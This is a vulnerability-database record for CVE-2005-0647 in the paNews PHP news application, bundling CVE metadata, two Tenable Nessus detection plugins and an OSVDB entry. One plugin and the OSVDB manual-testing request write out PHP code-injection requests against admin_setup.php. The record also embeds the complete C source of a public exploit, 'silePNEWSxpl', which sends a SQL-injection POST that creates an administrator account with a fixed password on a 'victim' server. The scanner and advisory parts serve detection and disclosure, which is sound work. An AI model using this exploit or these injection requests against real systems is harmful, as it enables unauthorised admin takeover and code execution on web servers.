{"id": "PANEWS_ADMIN_SETUP_PHP.NASL", "bulletinFamily": "scanner", "title": "paNews admin_setup.php Multiple Parameter Arbitrary PHP Code Injection", "description": "The remote host is running a version of paNews that fails to properly\nsanitize input passed to the script 'includes/admin_setup.php' and, in\naddition, allows writes by the web user to the directory 'includes'\n(not the default configuration). Taken together, these flaws allow a\nremote attacker to run arbitrary code in the context of the user\nrunning the web service or to read arbitrary files on the target.", "published": "2005-02-23T00:00:00", "modified": "2005-02-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/17201", "reporter": "This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://seclists.org/fulldisclosure/2005/Feb/523"], "cvelist": ["CVE-2005-0647"], "type": "nessus", "lastseen": "2021-01-20T13:25:35", "edition": 28, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0647"]}, {"type": "osvdb", "idList": ["OSVDB:15452"]}, {"type": "exploitdb", "idList": ["EDB-ID:866"]}, {"type": "nessus", "idList": ["PANEWS_INPUT_VULNS.NASL"]}], "modified": "2021-01-20T13:25:35", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-01-20T13:25:35", "rev": 2}, "vulnersScore": 6.8}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description) {\n script_id(17201);\n script_version(\"1.20\");\n script_cve_id(\"CVE-2005-0647\");\n script_bugtraq_id(12611);\n\n script_name(english:\"paNews admin_setup.php Multiple Parameter Arbitrary PHP Code Injection\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple flaws.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of paNews that fails to properly\nsanitize input passed to the script 'includes/admin_setup.php' and, in\naddition, allows writes by the web user to the directory 'includes'\n(not the default configuration). Taken together, these flaws allow a\nremote attacker to run arbitrary code in the context of the user\nrunning the web service or to read arbitrary files on the target.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2005/Feb/523\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Change the permissions on the 'includes/' directory so that the web\nuser cannot write to it.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/03/02\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Checks for remote code execution in admin_setup.php in paNews\");\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CGI abuses\");\n \n script_dependencies(\"panews_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(\"www/\" + port + \"/panews\");\nif (isnull(install)) exit(0);\nmatches = pregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = data_protection::sanitize_user_paths(report_text:matches[2]);\n\n if (safe_checks()) {\n if (ver =~ \"^([0-1]\\.|2\\.0b[0-4])$\") {\n security_hole(port:port, extra: \n\"***** Nessus has determined the vulnerability exists on the target\n***** simply by looking at the version number of paNews\n***** installed there.\n\");\n }\n }\n else {\n # Create includes/config.php.\n r = http_send_recv3(method:\"GET\", port: port,\n # nb: with a slightly different URL, you can run programs on the target.\n item:dir + \"/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)\");\n if (isnull(r)) exit(0);\n\n if (r[0] =~ \"^HTTP/.* 200 OK\") {\n # And now run it to include paNews Readme.txt in the top-level directory.\n r = http_send_recv3(method:\"GET\", port: port, \n # nb: if PHP's allow_url_fopen is enabled, you could also open\n # remote URLs with arbitrary PHP code.\n item:dir + \"/includes/config.php?nst=../Readme.txt\" );\n if (isnull(r)) exit(0);\n res = r[2];\n if (\"bugs@phparena.net\" >< res) {\n security_hole(port:port, extra:\nstring(\n \"***** \", dir + \"/includes/config.php\\n\",\n \"***** in the webserver's document directory. This file should be\\n\",\n \"***** deleted as soon as possible.\\n\\n\"));\n }\n }\n }\n}\n", "naslFamily": "CGI abuses", "pluginID": "17201", "cpe": [], "scheme": null, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}}

{"cve": [{"lastseen": "2021-02-02T05:24:35", "description": "admin_setup.php in paNews 2.0.4b allows remote attackers to inject arbitrary PHP code via the (1) $form[comments] or (2) $form[autoapprove] parameters, which are written to config.php.", "edition": 4, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-0647", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0647"], "modified": "2016-10-18T03:13:00", "cpe": ["cpe:/a:php_arena:panews:2.0.4b"], "id": "CVE-2005-0647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0647", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php_arena:panews:2.0.4b:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:11", "bulletinFamily": "software", "cvelist": ["CVE-2005-0647"], "edition": 1, "description": "## Vulnerability Description\npaNews contains a flaw that may allow an attacker to inject arbitrary PHP code. The issue is due to the $$comments or $$autapprove variables in the admin_setup.php script not being properly sanitized and may allow an attacker to inject PHP code. Other variables may also be effected.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\npaNews contains a flaw that may allow an attacker to inject arbitrary PHP code. The issue is due to the $$comments or $$autapprove variables in the admin_setup.php script not being properly sanitized and may allow an attacker to inject PHP code. Other variables may also be effected.\n## Manual Testing Notes\nGET http://hawking/panews/index.php?action=admin&op=setup&form[lang]=english&form[comments]=1&form[autoapprove]=1;%20?%3E%20%3C?%20include(%22/var/cpuinfo%22);%20?%3E%20%3C?%20$trivial=1 HTTP/1.1\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nAccept-Encoding: gzip,deflate\nAccept-Language: en-us,en;q=0.5\nHost: hawking\nReferer: http://hawking/panews/index.php\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0\nCookie: panews=%BF%3F%BF%3F0%BF%3F1108908178%BF%3F%BF%3Fframe%BF%3F0; IS_PANEWS=1\nKeep-Alive: 300\n## References:\nOther Advisory URL: http://www.kernelpanik.org/docs/kernelpanik/panews.txt\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=110969774502370&w=2\n[CVE-2005-0647](https://vulners.com/cve/CVE-2005-0647)\n", "modified": "2005-03-01T23:14:28", "published": "2005-03-01T23:14:28", "href": "https://vulners.com/osvdb/OSVDB:15452", "id": "OSVDB:15452", "title": "paNews admin_setup.php Multiple Parameter Arbitrary PHP Code Injection", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:03:31", "description": "paNews 2.0b4 Remote Admin Creation SQL Injection Exploit. CVE-2005-0647. Webapps exploit for php platform", "published": "2005-03-08T00:00:00", "type": "exploitdb", "title": "paNews 2.0b4 - Remote Admin Creation SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0647"], "modified": "2005-03-08T00:00:00", "id": "EDB-ID:866", "href": "https://www.exploit-db.com/exploits/866/", "sourceData": "/***************************************************\r\n* *\r\n* paNews v2.0b4 *\r\n* *\r\n* silePNEWSxpl *\r\n* This exploit utilize SQL injection for create *\r\n* a new user with admin privileges on paNews *\r\n* software system. *\r\n* *\r\n* References: *\r\n* packetstormsecurity.org/0503-exploits/panews.txt *\r\n *\r\n* *\r\n* coded by: Silentium of Anacron Group Italy *\r\n* date: 04/03/2005 *\r\n* e-mail: anacrongroupitaly[at]autistici[dot]org *\r\n* my_home: www.autistici.org/anacron-group-italy *\r\n* *\r\n* this tool is developed under GPL license *\r\n* no(c) .:. copyleft *\r\n* *\r\n***************************************************/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n\r\n#define PORT 80 // port of the web server\r\n\r\nvoid info(void);\r\nvoid sendxpl(int sock, char *argv[]);\r\nvoid errsock(void);\r\nvoid errgeth(void);\r\nvoid errconn(void);\r\n\r\nint main(int argc, char *argv[]){\r\n\r\nint sock, sockconn;\r\nstruct sockaddr_in addr;\r\nstruct hostent *hp;\r\n\r\nif(argc!=4)\r\n info();\r\n\r\nif((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n errsock();\r\n\r\nsystem(\"clear\");\r\nprintf(\"[*] Creating socket [OK]\\n\");\r\n\r\nif((hp = gethostbyname(argv[1])) == NULL)\r\n errgeth();\r\n\r\nprintf(\"[*] Resolving victim host [OK]\\n\");\r\n\r\nmemset(&addr,0,sizeof(addr));\r\nmemcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);\r\naddr.sin_family = AF_INET;\r\naddr.sin_port = htons(PORT);\r\n\r\nsockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));\r\nif(sockconn < 0)\r\n errsock();\r\n\r\nprintf(\"[*] Connecting at victim host [OK]\\n\");\r\n\r\nsendxpl(sock, argv);\r\n\r\nprintf(\"[*] Now check on\\n\"\r\n \" http://%s%s\\n\\n\"\r\n \" your username: %s\\n\"\r\n \" with password: anacron\\n\\n\",argv[1],argv[2],argv[3]);\r\n\r\nshutdown(sock, 2);\r\nclose(sock);\r\n\r\nreturn(0);\r\n\r\n}\r\n\r\nvoid info(void){\r\n\r\nsystem(\"clear\");\r\nprintf(\"#########################################\\n\"\r\n \"# paNews v2.0b4 exploit #\\n\"\r\n \"#########################################\\n\"\r\n \"# this exploit create a new user admin #\\n\"\r\n \"# on paNews software system. #\\n\"\r\n \"# exploit coded by Silentium #\\n\"\r\n \"# Anacron Group Italy #\\n\"\r\n \"# www.autistici.org/anacron-group-italy #\\n\"\r\n \"#########################################\\n\\n\"\r\n \"[usage]\\n\\n\"\r\n \" silePNEWSxpl <victim> <path_paNews> <username>\\n\\n\"\r\n \"[example]\\n\\n\"\r\n \" silePNEWSxpl www.victim.com /panews/index.php silentium\\n\\n\");\r\nexit(1);\r\n\r\n}\r\n\r\nvoid sendxpl(int sock, char *argv[]){\r\n\r\nFILE *out;\r\nint size = 264;\r\nout = fdopen(sock,\"a\");\r\nsetbuf(out,NULL);\r\n\r\nsize+=(strlen(argv[3]) * 2);\r\n\r\nfprintf(out,\"POST %s HTTP/1.0\\n\"\r\n \"Connection: Keep-Alive\\n\"\r\n \"Pragma: no-cache\\n\"\r\n \"Cache-control: no-cache\\n\"\r\n \"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\\n\"\r\n \"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\\n\"\r\n \"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\\n\"\r\n \"Accept-Language: en\\n\"\r\n \"Host: %s\\n\"\r\n \"Referer: http://%s%s\\n\"\r\n \"Content-Type: application/x-www-form-urlencoded\\n\"\r\n \"Content-Length: %d\\n\\n\"\r\n \"action%%3Dlogin%%26username%%3D%s%%26password%%3Danacron%%26\"\r\n \"mysql_prefix%%3Dpanews_auth%%60%%20VALUES%%20(%%22%%22,%%22\"\r\n \"%s%%22,%%22f63140655b379e65f6cd87fa3c3da631%%22,%%22\"\r\n \"hackit%%22,%%22admins%%7Ccat%%7Ccomment%%7Cnewsadd%%7Cnewsedit\"\r\n \"%%7Cprefset%%7Csetup%%22,%%22none%%22,%%22127.0.0.1%%22\"\r\n \",1,1)%%00\\n\\n\",argv[2],argv[1],argv[1],argv[2],size,argv[3],argv[3]);\r\n\r\n printf(\"[*] Sending exploit [OK]\\n\\n\");\r\n\r\n}\r\n\r\nvoid errsock(void){\r\n\r\nsystem(\"clear\");\r\nprintf(\"[x] Creating socket [FAILED]\\n\\n\");\r\nexit(1);\r\n\r\n}\r\n\r\nvoid errgeth(void){\r\n\r\nprintf(\"[x] Resolving victim host [FAILED]\\n\\n\");\r\nexit(1);\r\n\r\n}\r\n\r\nvoid errconn(void){\r\n\r\nprintf(\"[x] Connecting at victim host [FAILED]\\n\\n\");\r\nexit(1);\r\n\r\n}\n\n// milw0rm.com [2005-03-08]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/866/"}], "nessus": [{"lastseen": "2021-01-20T13:25:35", "description": "The remote host is running a version of paNews that suffers from the\nfollowing vulnerabilities:\n\n - SQL Injection Issue in the 'login' method of includes/auth.php.\n A remote attacker can leverage this vulnerability to add \n users with arbitrary privileges.\n\n - Local Script Injection Vulnerability in includes/admin_setup.php.\n A user defined to the system (see above) can inject arbitrary\n PHP code into paNews' config.php via the 'comments' and \n 'autapprove' parameters of the 'admin_setup.php'\n script.", "edition": 26, "published": "2005-03-18T00:00:00", "title": "paNews 2.0.4b Multiple Input Validation Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0647", "CVE-2005-0646"], "modified": "2005-03-18T00:00:00", "cpe": [], "id": "PANEWS_INPUT_VULNS.NASL", "href": "https://www.tenable.com/plugins/nessus/17574", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description) {\n script_id(17574);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2005-0646\", \"CVE-2005-0647\");\n script_bugtraq_id(12687);\n\n script_name(english:\"paNews 2.0.4b Multiple Input Validation Vulnerabilities\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from\nmultiple flaws.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of paNews that suffers from the\nfollowing vulnerabilities:\n\n - SQL Injection Issue in the 'login' method of includes/auth.php.\n A remote attacker can leverage this vulnerability to add \n users with arbitrary privileges.\n\n - Local Script Injection Vulnerability in includes/admin_setup.php.\n A user defined to the system (see above) can inject arbitrary\n PHP code into paNews' config.php via the 'comments' and \n 'autapprove' parameters of the 'admin_setup.php'\n script.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.kernelpanik.org/docs/kernelpanik/panews.txt\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2005/Mar/20\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/03/18\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/03/02\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n script_summary(english:\"Detects input validation vulnerabilities in paNews\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n \n script_dependencies(\"panews_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/panews\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/panews\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n\n if (ver && ver =~ \"^([0-1]\\.|2\\.0b[0-4])$\")\n {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}